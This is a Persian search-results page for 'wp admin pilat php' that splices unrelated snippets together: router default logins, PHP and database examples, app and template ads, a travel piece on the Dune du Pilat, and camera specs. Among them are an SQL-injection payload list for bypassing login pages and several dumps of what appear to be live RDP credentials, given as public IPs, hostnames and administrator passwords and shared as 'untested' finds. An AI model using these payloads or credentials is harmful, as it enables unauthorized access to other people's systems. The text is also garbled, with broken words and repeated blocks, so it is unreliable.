wp admin pilat php

متن wp admin pilat php مابین تمامی مطالب و اخبار از هزاران سایت و وبلاگ فارسی جستجو و نتایج زیر به دست آمده است. هیچ یک از عناوین منتشر شده توسط سایت خبری ماهنامه ایجاد نگردیده و اطلاعات از سایتهای مرجع آن بازنشر شده است.

مجموعه دستوراتی که برای تزریق به صفحات لاگین در باگ sql استفاده میشود شامل موارد زیر میشود. or'1'='1'or'1'='1''or'1'='1'or'1'='1' or ' '='' or ''='admin'or''='admin" or "a"="admin" or 1=1 --admin' or 1=1 --admin' or 'a'='aadmin') or ('a'='aadmin") or ("a"="aa=1)--admin'--' or 0=0 --" or 0=0 --or 0=0 --' or 0=0 #" or 0=0 #or 0=0 #' or 'x'='x" or "x"="x') or ('x'='x' or 1=1--" or 1=1--or 1=1--' or a=a--" or "a"="a') or ('a'='a") or ("a"="ahi" or "a"="a hi" or 1=1 --hi' or 1=1 --hi' or 'a'='ahi') or ('a'='ahi") or ("a"="a که نفوذگر با قرار دادن این دستورات در صفحات لاگین یک وب سایت بدون داشتن یوزر و پسورد اقدام به byp به پنل مدیریتی یا کاربری میکند. ...

اینم چنتا good که امروز گرفتم تست نشدن 27.109.6.242:3389@jbbrothers\administrator;admin@123 43.252.103.71:3389@server\administrator;admin@123 14.102.111.45:3389@emeditek\administrator;admin@123 14.142.40.48:3389@fiaplcorp\administrator;p@ssw0rd@123 114.143.242.20:3389@mmskh\administrator;123@admin 45.64.14.16:3389@server\administrator;admin@123 103.12.135.40:3389@rspl\administrator;admin@123 59.90.207.211:3389@lenovo-j52m7s16\administrator;admin@123 103.43.153.37:3389@test\administrator;admin@123 ...

هنوزم عشق منیدااااااا زندگی بدون ما سخته یادش بخیر به خدا واقعا که یادش بخیر چه روزایی چه ساعت هایی با دوستان بودیم مستانه مبینا رامین0098 و خیلیایه دیگه رز124 ( admin ) 1 admin ( admin ) 2 talone ( mod ) 3 رضا00 ( mod ) 4 پسرتنها ( mod ) 5 mahdiye ( mod ) 6 behnam ( mod ) 7 รհձყձռ ( admin ) 8 haniye15 ( mod ) 9 نسترن77 ( mod ) 10 ʍօֆȶǟʄǟ ( mod ) 11 milad_16 ( mod ) 12 pouya king ( admin ) 13 ageneral ( mod ) 14 پیشی ( mod ) 15 ...

141.105.71.30:3389@l3i2isted1vu761\administrator;windows1 122.160.18.38:3389@server\administrator;123@admin 122.176.64.207:3389@erpserver\administrator;admin@12345 182.74.248.60:3389@qaserver001\administrator;admin@12345 182.72.195.184:3389@blvl\administrator;admin@123 182.69.119.9:3389@dell-pc\administrator;admin@123 182.74.63.158:3389@aatharv\administrator;admin@123 182.71.201.2:3389@technopak\administrator;p@ssw0rd تست نشده ! ...

imlock admin app is to remotely control all of your imlock users on android or windows. this app is installed on the parent's or admin's... ...

آموزش زبان php + شی گرایی در کوئری هنگامی که شما بخواهید کلمه ای را جستجو نمایید که شبیه آن دردیت س وجودداشته باشد از like استفاده میکنیم در فریم ورک yii برای این کار به روش زیر عمل می کنیم : روش اول: $model = user::find() ->where(['like', 'username', 'admin']) ->all(); //or $model = user::find() ->where('username like :query') ->addparams([':query'=>'%admin%']) ->all(); که وجی ای معادل زیر دارد: select * from `tbl_user` where `username` like '%admin%' روش دوم: $model = user::find() ->where(['not like', 'username', 'admin']) ->all(); با وجی زیر select * from `tbl_user` where `username` not like '%admin%' ...

46.45.187.176@administrator;asdqwe123! 93.145.3.147@admin;zaq12wsx 36.250.69.7@administrator;asdasd123 77.93.244.186@admin;temp99 37.206.244.203@admin;qwerty123 46.105.174.136@administrator;lol123lol! 46.105.174.128@administrator;lol123lol! 86.58.131.184@administrator;abcd1234! 78.187.11.232@user;1234 78.188.59.20@user;p word2012 78.187.22.150@user;123456aa 46.238.21.216@administrator;1 193.35.40.186@administrator;p@ssw0rd@123 91.148.186.203@administrator;qwerty1 46.10.239.136@administrator;admin1 46.40.73.182@administrator;1q2w#e$r 46.233.49.29@administrator;pa55word 87.126.167.217@administrator;123456 158.58.231.42@administrator;zxcqwe 36.48.69.253@administrator;aa1 42.51.8.158@administrator;ab123456 36.250.79.245@administrator;qq123456 91.109.16.243@administrator;qwert12345 52.1.160.211@administrator;p@ssw0rd 167.114.130.33@administrator;admin@123 ...

use admin db.createuser( { user: "siteuseradmin", pwd: "p word", roles: [ { role: "useradminanydatabase", db: "admin" } ] } ) ...

آی پی ورود به تنظیمات مودم برای مودم های مختلف متفاوت است . در اکثر مودم ها این آی پی 192.168.1.1 می باشد .ip ورود به تنظیمات مودم های مختلف به شرح ذیل می باشد :ip ورود به تنظیمات مودم های دی لینک : 192.168.1.1 - 192.168.0.1ip ورود به تنظیمات مودم های تی پی لینک : 192.168.1.1ip ورود به تنظیمات مودم های زای ل : 192.168.1.1ip ورود به تنظیمات مودم های هوآوی : 192.168.1.1ip ورود به تنظیمات مودم های ایسوس : 192.168.1.1ip ورود به تنظیمات مودم های بلکین : 192.168.2.1ip ورود به تنظیمات مودم های بنکیو : 192.168.1.1ip ورود به تنظیمات مودم های بوفالو : 192.168.11.1ip ورود به تنظیمات مودم های سیسکو : 192.168.1.1ip ورود به تنظیمات مودم های اینتل : 192.168.1.1ip ورود به تنظیمات مودم های لینک سیس :192.168.1.1 - 192.168.0.1 - 192.168.1.225 - 192.168.1226 -192.168.1.245 - 192.168.1.246یوزرنیم و پسورد ورود به تنظیمات مودم های مختلف به شرح زیر است :usernameو p word ورود به تنظیمات مودم های دی لینک : user : admin - p : 1234 p : admin username و p word ورود به تنظیمات مودم های تی پی لینک : user : admin - p : a ...

آی پی ورود به تنظیمات مودم برای مودم های مختلف متفاوت است . در اکثر مودم ها این آی پی 192.168.1.1 می باشد .ip ورود به تنظیمات مودم های مختلف به شرح ذیل می باشد :ip ورود به تنظیمات مودم های دی لینک : 192.168.1.1 - 192.168.0.1ip ورود به تنظیمات مودم های تی پی لینک : 192.168.1.1ip ورود به تنظیمات مودم های زای ل : 192.168.1.1ip ورود به تنظیمات مودم های هوآوی : 192.168.1.1ip ورود به تنظیمات مودم های ایسوس : 192.168.1.1ip ورود به تنظیمات مودم های بلکین : 192.168.2.1ip ورود به تنظیمات مودم های بنکیو : 192.168.1.1ip ورود به تنظیمات مودم های بوفالو : 192.168.11.1ip ورود به تنظیمات مودم های سیسکو : 192.168.1.1ip ورود به تنظیمات مودم های اینتل : 192.168.1.1ip ورود به تنظیمات مودم های لینک سیس :192.168.1.1 - 192.168.0.1 - 192.168.1.225 - 192.168.1226 -192.168.1.245 - 192.168.1.246یوزرنیم و پسورد ورود به تنظیمات مودم های مختلف به شرح زیر است :usernameو p word ورود به تنظیمات مودم های دی لینک : user : admin - p : 1234 p : admin username و p word ورود به تنظیمات مودم های تی پی لینک : user : admin - p : a ...

آی پی ورود به تنظیمات مودم برای مودم های مختلف متفاوت است . در اکثر مودم ها این آی پی 192.168.1.1 می باشد .ip ورود به تنظیمات مودم های مختلف به شرح ذیل می باشد :ip ورود به تنظیمات مودم های دی لینک : 192.168.1.1 - 192.168.0.1ip ورود به تنظیمات مودم های تی پی لینک : 192.168.1.1ip ورود به تنظیمات مودم های زای ل : 192.168.1.1ip ورود به تنظیمات مودم های هوآوی : 192.168.1.1ip ورود به تنظیمات مودم های ایسوس : 192.168.1.1ip ورود به تنظیمات مودم های بلکین : 192.168.2.1ip ورود به تنظیمات مودم های بنکیو : 192.168.1.1ip ورود به تنظیمات مودم های بوفالو : 192.168.11.1ip ورود به تنظیمات مودم های سیسکو : 192.168.1.1ip ورود به تنظیمات مودم های اینتل : 192.168.1.1ip ورود به تنظیمات مودم های لینک سیس :192.168.1.1 - 192.168.0.1 - 192.168.1.225 - 192.168.1226 -192.168.1.245 - 192.168.1.246یوزرنیم و پسورد ورود به تنظیمات مودم های مختلف به شرح زیر است :usernameو p word ورود به تنظیمات مودم های دی لینک : user : admin - p : 1234 p : admin username و p word ورود به تنظیمات مودم های تی پی لینک : user : admin - p : a ...

آی پی ورود به تنظیمات مودم برای مودم های مختلف متفاوت است . در اکثر مودم ها این آی پی 192.168.1.1 می باشد .ip ورود به تنظیمات مودم های مختلف به شرح ذیل می باشد :ip ورود به تنظیمات مودم های دی لینک : 192.168.1.1 - 192.168.0.1ip ورود به تنظیمات مودم های تی پی لینک : 192.168.1.1ip ورود به تنظیمات مودم های زای ل : 192.168.1.1ip ورود به تنظیمات مودم های هوآوی : 192.168.1.1ip ورود به تنظیمات مودم های ایسوس : 192.168.1.1ip ورود به تنظیمات مودم های بلکین : 192.168.2.1ip ورود به تنظیمات مودم های بنکیو : 192.168.1.1ip ورود به تنظیمات مودم های بوفالو : 192.168.11.1ip ورود به تنظیمات مودم های سیسکو : 192.168.1.1ip ورود به تنظیمات مودم های اینتل : 192.168.1.1ip ورود به تنظیمات مودم های لینک سیس :192.168.1.1 - 192.168.0.1 - 192.168.1.225 - 192.168.1226 -192.168.1.245 - 192.168.1.246یوزرنیم و پسورد ورود به تنظیمات مودم های مختلف به شرح زیر است :usernameو p word ورود به تنظیمات مودم های دی لینک : user : admin - p : 1234 p : admin username و p word ورود به تنظیمات مودم های تی پی لینک : user : admin - p : a ...

gstm admin helps you to keep control of the user in an easy and practical way regulating the tracking times of your devices. app features:... ...

network know-how: an essential guide for the accidental adminnetwork know-how: an essential guide for the accidental admin | author(s): john ross dr | publisher: no starch press | year: 2009 | language: english | pages: 292 | size: 7 mb | extension: pdfدریافت فایل network know-how: an essential guide for the accidental admin ...

کامپوننت تغییر منو های مدیریت admin menu manager pro 2.2.7 برای جوملا 3_2.5 کامپوننت admin menu manager pro یکی از بهترین کامپوننت های برای تغییر منوهای مدیریت سایت جوملا می باشد. اگر شما می خواهید یک منوی سفارشی برای مدیریت جوملا برای دسترسی آسانتر به آیتم های مورد نظر خود ایجاد نمایید. ما کامپوننت admin menu manager pro را به شما پیشنهاد می کنیم. کامپوننت admin menu manager pro با امکاناتی که دارد می توانید مکان منو را بالا ، پایین ، چپ ، تغییر دهید، و نوع منو را هم معمولی ، پاپ آپ ،شناور کنید و با موبایل و تبلت هم ساز گاری دارد و می توانید از طریق موبایل سای ... دریافت فایل ...

http://www.iikss.com/fa/index.php/route/news_det/njc1ng ...

دنیا پر از شگفتیه و این رو تنها ایی می دونند که به دنبال کشف و بیشتر دیدن هستن. تصور کنین در جنگل های فرانسه قدم می زنین که با تپه ماسه ای رو برو میشین، تپه ای عظیم و مرتقع، تا به اینجای داستان جذاب و باورن یه، شبیه به های تخیلی، اما این تمام ماجرا هم نیست. پس از اینکه از 100 متر ماسه بالا رفتین، با منظره ای زیبا از ساحل و دریایی فیروزه ای رنگ روبرو میشین، اما باور کنین که این نه تخیل نویسنده هست و نه فتوشاپ! ، بلکه جاذبه طبیعیِ، یکی از شا ارهای خلقت و شگفتی های طبیعت، یکی از باورن ی های دنیا که سالانه میلیون ها نفر برای بازدیدش به فرانسه سفر می کنن. اسمش " دون دو پیلا " (la dune du pilat)است . کمی بیشتر درباره " دون دو پیلا " شبیه به یه غول ماسه ای خسته اس، که اولین جایی که برای استراحت پیدا کرده رو غنیمت شمرده و همون جا اتراق کرده، بین جنگل و ساحل. این غول خسته اما این روزها، به یکی از جاذبه های گردشگری فرانسه تبدیل شده که در 60 کیلومتری شهر بورد ...

londinium – responsive bootst 3 admin template html دسته بندی html بازدید ها 79 فرمت فایل rar حجم فایل 11058 کیلو بایت تعداد صفحات فایل 4 فروشنده فایل کد کاربری 596 تمام فایل ها قالب زیبای بوت است londinium ...

the bluelink admin is a simple & easy to use app for connecting to the bluelink eld device over bluetooth and configuring the parameters... ...

چگونه وارد بخش مدیریت سایتم شوم ؟ برای وارد شدن به بخش مدیریت ، ابتدا آدرس سایت خود را نوشته و انتهای آن به ترتیب زیر " admin / " را اضافه می کنید :م mybwebsite.sepehrcc.com/admin سپس با وارد شدن در این صفحه نام کاربری و پسورد خود را وارد نمایید . در صورتیکه پسورد خود را فراموش کرده باشید، می توانید بر روی " رمز خود را فراموش کرده ام" کلیک کرده و با دادن آدرس ایمیل خود ، یک ایمیل برای تغییر رمز خود دریافت نمایید. - برای وارد نام کاربری و رمز دقت نمایید که عینا همان رمزی که در ابتدای ثبت نام وارد نموده اید و درایمیل فعال سازی شما ذکرشده است، را تایپ کنید . ...

14.97.155.228:3389@poonam-pc\administrator; 14.99.66.8:3389@tmindia\administrator;abc123abc 1.22.113.75:3389@win7-p2\administrator;123 14.99.224.159:3389@lenovo-pc\administrator;123 14.98.42.93:3389@a-pc\administrator;1234 14.99.43.33:3389@prakash\administrator;12345 14.96.34.174:3389@s6007own\administrator;123456 14.97.55.178:3389@serverrspl\administrator;admin 14.97.128.200:3389@dwv\administrator;admin@123 14.97.204.197:3389@dlv-msl-pc\administrator;admin@123 14.96.44.218:3389@trf\administrator;admin@1234 14.97.230.194:3389@nuni\administrator;admin123 14.98.32.90:3389@hmindia\administrator;asd@123 14.97.46.252:3389@persistent\administrator;p@ssw0rd 14.97.71.165:3389@persistent\administrator;p@ssw0rd 14.97.212.224:3389@persistent\administrator;p@ssw0rd 14.97.208.66:3389@persistent\administrator;p@ssw0rd 14.97.48.134:3389@persistent\administrator;p@ssw0rd 14.97.195.234:3389@persistent\administrator;p@ssword 14.97.42.242:3389@hqnet\administrator;p word ...

بدست آوردن سریال دستگاه : [admin@ciscohome.ir] > system routerboard print routerboard: yes model: “750” serial-number: “205201889d93” current-firmware: “2.22” upgrade-firmware: “2.22” [admin@ciscohome.ir] > بدست آوردن سطح لایسنس دستگاه : [admin@ciscohome] > system license print software-id: “rzts-yef1” upgradable-to: v5.x nlevel: 4 features: [admin@ciscohome] > بدست آوردن مشخصه های سخت افزاری : [admin@ciscohome] > system resource print uptime: 2d12h19m12s version: “4.3” free-memory: 17196kb total-memory: 29944kb cpu: “mips 24k v7.4” cpu-count: 1 cpu-frequency: 400mhz cpu-load: 8 free-hdd-space: 29296kb total-hdd-space: 61440kb write-sect-since-reboot: 85825 write-sect-total: 322192 bad-blocks: 0 architecture-name: “mipsbe” board-name: “rb750” [admin@ciscohome] > در صورت نیاز به مشاوره و راه اندازی شبکه ، voip ، سیسکو و میکروتیک می توانید با شماره 09358697575 - 09151408626 تماس بگیرید ...

des we are league of legend persian community we are global community and we are introducing these tournaments to players to enjoy the competitive play and to get stronger. we give you the opportunity to improve your skill and prove yourself for prizes. the iranian can play in our tournament from any place. we are trying to make high quality tournaments. remember the admin will try his best to join the lobby as fast as he can . if you meet any trouble just call the admin and he will make the right decision. read the rules carefully if you are having any question you can come to our site: sarilol.blog.ir and talk to the admins "who has tournament admin role" or you can contact us in game by adding agha 123 all you need to register in our tournaments from here : https://docs.google.com/forms/d/e/1faipqlscfw-p7jttkwfr4un3nru-kdhuzsrgsxfcr1znrxfnxauhydw/viewform information: 1- check in start in 30 min before match start if you missed it tell the admin " agha 123 " 2- you can play in our tournament with any level or rank division 3 - admin name in game : agha 123 4 - our site : https://sarilol.ir 5 - you must know that admin is trying his best to make best tournaments 6 - if you are first time at tournament online and you think that is you cant win because they are all high elo .. every one have chance to from bronze - challenger. if you have any ideas to make our tournament better send email to : ma de76@gmail.com ...

مشخصات عمومی نوع دوربین : خانگی مقاومت در برابر محیط : وزن دوربین با باتری (گرم) : 126 حسگر ابعاد تصویر (پی ل) : 5152 در 3864 محدوده دقت حسگر : 20 مگاپی ل و بیشتر تعداد پی ل (mp) : 20 نوع حسگر : ccd تصویر میزان حساسیت سنسور (iso) : auto 100, 200, 400, 800, 1600 لرزشگیر : نوع لرزشگیر : digital عکاسی با فرمت خام (raw) : لنز فاصله کانونی (در فرمت 35 میلیمتری) (میلیمتر) : 224 - 28 محدوده زوم : 6 تا 10 برابر بزرگنمایی زوم اپتیکال : 8x زوم دیجیتال : 4x فو دستی : کمترین فاصله فو (ماکرو) (سانتیمتر) : 1 صفحه نمایش صفحه نمایش چرخان : اندازه صفحه نمایش (اینچ) : 2.7 تعداد پی ل های صفحه نمایش : 230,000 صفحه نمایش لمسی : نوع صفحه نمایش : lcd قابلیت live view : چشمی : ع برداری بازترین دیافراگم : f/3.2 – f/6.9 حداقل سرعت شاتر (ثانیه) : 15 حداکثر سرعت شاتر (ثانیه) : 1/2000 عکاسی با اولویت تعیین دیافراگم : عکاسی با اولویت تعیین شاتر : عکاسی دستی : ح های پیش فرض عکاسی : فلاش : عکاسی با تاخیر زمانی (self-timer) : دارد (2 یا 10 ثانیه، سفارشی) عکاسی ...

source code repositories for project user-admin hosted on kenai.com. original fetch urls: https://svn.kenai.com/svn/user-admin~source-code-repository svn exported with 'svnrdump' and compressed with lzip, git exported with 'git bundle', hg exported with 'hg bundle'.. this item belongs to: data/opensource. this item has files of the following types: archive bit , metadata, unknown ...

ضروری ها با تایپ admin! میتونین به منو ادمینی وارد شوید و یا عبارت bind p "sye !admin" در کنسول میتونین با زدن p در بازی منو ادمینی باز کنید. ادامه مطلب ...

this article is so full of bogus tabloid drama: the "gold" curtains are from bill clinton's admin. the rug is reagan's oval office rug. the sofas i believe are from bush #43 and the two chairs in the sitting area i can't identify. i believe the lamps are from the clinton admin, also. the arm chairs beside the desk look like those from the obama admin. don't get it twisted!! there's nothing "gold plated or "dripping" gold except gold leaf frames for paintings that have hung in multiple administrations ...

با سلام و خسته نباشید خدمت دوستان گرامی امروز قصد دارم یک کد لایگن ساده براتون بذارم. این کد رو دو شب پیش همینطوری داشتم تمرین می و نوشتمش. در این کد از جلسه ( sesision ) ها استفاده شده که گفته میشه امنیت و کاراییش بهتر و بیشتر از کوکی هستش. این فایل شامل دو بخش است یکی صفحه login.php و دیگری صفحه admin.php هستش. که در صفحه لاگین بایستی کاربر یوزر نیم و پسورد خودش را وارد کند و بعد با کلیک بر روی send اگر اطلاعات درست وارد شده باشد به صفحه admin وارد میشود و با نوشته welcome رو به رو می شود و چنانچه درست وارد نکرده باشد باشد با woooooooooow . یوزر نیم و پسورد به طور پیشفرض admin - admin تغریف شده اند. برای دیدن کد به ادامه مطلب رجوع کنید ... ادامه مطلب ...

حمل بار در غرب، شرق و شمال تهران حمل بار در غرب، شرق و شمال تهران *باربری تهران*- *اتوبار تهران* با سابقه ترین و مطمئن ترین موسسه در جابجایی اثاثیه منزل ،جابجایی ج ه عروس ،کالاهای اداری ، تجاری،شرکتها،بانکهاوسازمانهای تی و خصوصی در سطح تهران می باشد . باربری کاشانی-اتوبار کاشانی با در اختیار داشتن کامیونهای مسقف و روباز از قبیل تریلی – ده تن –خاور –کامیونت و نیسان با بیمه و بارنامه تی در حمل و نقل شهری و برون شهری با کادری مجرب و خوش اخلاق و بدون تعطیلی به صورت شبانه روزی آماده خدمت به شما عزیزان می باشد . ادامه مطلب ...

samsung flash files> j series> j320m-ds - galaxy j3 firmware> j320mubu0ape1_j320mzto0ape1_brazil android 5.1.1_4file firmware> ..."> j320m-ds - galaxy j3 firmware_j320mubu0ape1_j320mzto0ape1_brazil android 5.1.1_4file firmware started by admin , today 06:18 am replies: 0 views: 1 rating0 / 5 last post by admin view profile view forum posts private message today, 06:18 am samsung flash files> g series> g900i> g900iddu1cpe2_g900iodd1cpe2_india android 6.0.1_4file firmware> ..."> g900i_g900iddu1cpe2_g900iodd1cpe2_india android 6.0.1_4file firmware started by admin , today 06:14 am replies: 0 views: 1 rating0 / 5 last post by admin view profile view forum posts private message today, 06:14 am samsung flash files> g series> g900h> g900hxxu1cpe6_g900hoxy1cpe6_russia android 6.0.1_4file firmware> ..."> g900h_g900hxxu1cpe6_g900hoxy1cpe6_russia android 6.0.1_4file firmware started by admin , today 06:08 am replies: 0 views: 1 rating0 / 5 last post by admin view profile view forum posts private message today, 06:08 am samsung flash files> g series> g530bt - grand prime duos firmware> g530btvjs1ape1_g530btzto1aoh2_brazil android 4.4.4_4file firmware> ..."> g530bt - grand prime duos firmware_g530btvjs1ape1_g530btzto1aoh2_brazil android 4.4.4_4file firmware started by admin , today 06:01 am replies: 0 views: 1 rating0 / 5 last post by admin view profile view forum posts private message today, 06:01 am huawei flash files> h series> honor 4x - che> che1-l04 firmware> file send date..."> hon ...

restaurant android + ios + admin سورس مشتری با استفاده از سلول خود، به طور کامل تعاملی و منو رستوران، غذا و نوشیدنی ها را انتخاب می کند و سفارش خود را به طور مستقیم به آشپزخانه می فرستد کاهش هزینه ها: نیاز به پیشخدمت چند و رفع تمام مراحل. علاوه بر اینکه مشتری با استفاده از نرم افزار سرگرم می شود، با توجه به سهولت بیشتر درخواست ها و توانایی دیدن تصاویر، بیشتر مصرف می شود. و بیشتر!دمو https://codecanyon.net/item/restaurant-android-ios-admin/18580638 فایل >>> سایر محصولات :سورس droid app locker برنامه applocker، یک... restaurant android + ios + admin سورس مشتری با استفاده از سلول... سورس quit smoking (android) برنامه انگیزشی برای انی که می خواهند... سورس healer - react native app (android/ios) healer app template - برنامه react... سورس اماده codecanyon movie review app سلام، پس از برداری موفق... سورس اماده cl ified local search engine هر چیزی را... سورس اماده motocross madness + admob + leaderboard برای تبدیل شدن به یک... سورس droid app lockerrestaurant android + ios + admin سورسسورس quit smoking (android)سورس healer - react nati ...

مشخصات عمومی نوع دوربین : نیمه حرفه ای وزن دوربین با باتری (گرم) : 230 گرم حسگر محدوده دقت حسگر : 16 مگاپی ل نوع حسگر : cmos تصویر میزان حساسیت سنسور (iso) : 100-12800 لرزشگیر : ندارد عکاسی با فرمت خام (raw) : لنز زوم اپتیکال : زوم دیجیتال : فو خ ر : فو دستی : دارد صفحه نمایش صفحه نمایش چرخان : اندازه صفحه نمایش (اینچ) : 3 تعداد پی ل های صفحه نمایش : 1040000 نقطه صفحه نمایش لمسی : چشمی : ع برداری حداقل سرعت شاتر (ثانیه) : حداقل : 8 ثانیه حداکثر سرعت شاتر (ثانیه) : حداکثر : 1/2000 ثانیه عکاسی با اولویت تعیین دیافراگم : عکاسی با اولویت تعیین شاتر : عکاسی دستی : ح های پیش فرض عکاسی : فلاش : برد فلاش (متر) : 5 متر قابلیت نصب فلاش خارجی : ح های فلاش : ،auto/red-eye reduction flash on w/ red-eye reduction auto, on, off, slow syncho قابلیت عکاسی پیاپی : 9 فریم در ثانیه عکاسی با تاخیر زمانی (self-timer) : 2 یا 10 ثانیه ح های نورسنجی : ارزی ، نقطه ای ، مرکزی ترکیب نورسنجی (exposure compen ion) : ±2 (at 1/3 ev steps) عکاسی سه بعدی : ندارد عکاسی پانو ...

آخرین مطالب